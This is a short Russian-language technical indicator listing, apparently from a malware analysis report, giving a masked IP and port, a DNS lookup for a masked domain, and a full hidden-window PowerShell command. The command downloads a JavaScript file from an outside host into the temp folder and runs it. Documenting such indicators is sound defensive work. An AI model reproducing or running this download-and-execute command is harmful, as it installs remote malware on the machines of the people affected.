Техническая информация
- '10#.#43.33.208':80
- DNS ASK be####odhagroup.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $yugujg='kjxrchvjb';iex($env:clower);$footer=$env:temp+'\1564029281006.js';$glow.DownloadFile('https://bech6lodhagroup.net/1564029314384.js',$footer);Invoke-Item $footer;' (со скрытым окном)